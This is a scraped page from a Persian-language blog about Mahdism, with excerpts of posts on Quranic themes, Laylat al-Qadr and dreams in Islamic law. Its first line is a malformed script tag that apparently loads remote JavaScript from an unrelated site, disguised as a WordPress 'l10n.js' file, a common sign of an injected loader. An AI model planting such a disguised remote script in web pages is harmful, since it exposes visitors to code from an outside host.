script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> حکومت شايستگان از نگاه قرآن
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند

حکومت شايستگان از نگاه قرآن

اميد به حاکميت "انسان‌هاي صالح" در آينده­اي روشن و استقرار عدالت و صلح فراگير و همگاني، امري فطري است. همة افراد، براساس فطرت ذاتي خود، به اميد روزي هستند که جهان در پرتو هدايت‌هاي انساني شايسته و با تأييد و عنايت پروردگار هستي، از بيداد و تباهي رهايي يافته، از نا بساماني­ها، ناامني‌ها و تيره‌روزي­ها خلاص شود و سرانجام به صلح و صلاح نايل آيد.



ادامه مطلب ...
چهار شنبه 23 شهريور 1390برچسب:شبی چون صبح نورانی,شبی چون صبح نورانی, :: 7:44 ::  نويسنده : زارعی

شبي چون صبح نوراني

 

شب قدر است و طي شد نامة هجر
آن شب كه بايد شكوائية هجران را در نورديد و به اميد وصل ديدار بيدار نشست و از جام طهور ((سلام)) تا ((مطلع فجر))، سرمست بود، كدام شب است؟آن شب كه شاعر حافظ قرآن، با الهام گرفتن از قرآن، آن را ((شب وصل)) مي‌نامد و نامة هجران را در آن شب، طي‌شده و پايان ـ يافته مي‌خواند، كدام شب نوراني و دل‌افروز است؟



ادامه مطلب ...

جوانان منتظر و قرآن كريم

جوانان، بازوي قدرتمند دفاع و سازندگي هر جامعه و تأثير‌گذارترين افراد در تحولات جامعه‌اند.

ويژگي‌هاي جوان آنقدر مهم و با ارزش است كه در تشكيل حكومت جهاني امام عصر عجل الله تعالي فرجه الشريف چشمگير و نمايان است.در جهان كنوني كه عصر بي‌معنويتي و بي‌اخلاقي است بسياري از جوانان جامعه ما توجه خاصي به معنويت، قرآن و اهل بيت عليهم السلام از خود نشان مي‌دهند.

 



ادامه مطلب ...

تفسيري كه به توصيه امام زمان عجل الله تعالي فرجه الشريف نوشته شد

 

از پديده‌هاي پيچيده‌اي كه براي انسان رخ مي‌دهد، رؤيا است. درباره ماهيت واقسام رؤيا، سخن بسيار است؛ از جمله آن‌ها بحثي فقهي است كه آيا خواب حجت شرعي است يا نه؟
فقهاي بزرگ براين مطلب توافق دارند كه خواب ديدن نمي‌تواند مبناي تكليف و حكمي شرعي قرارگيرد؛ براي نمونه اگر كسي در خواب، پيامبر صل الله عليه و آله و سلم يا ائمه اطهار عليهم السلام را ببيند و با استناد به آن رؤيا حديثي از آنان نقل كند، ارزش و اعتباري ندارد.



ادامه مطلب ...

صفحه قبل 1 صفحه بعد

درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 3
بازدید دیروز : 4
بازدید هفته : 42
بازدید ماه : 92
بازدید کل : 32861
تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1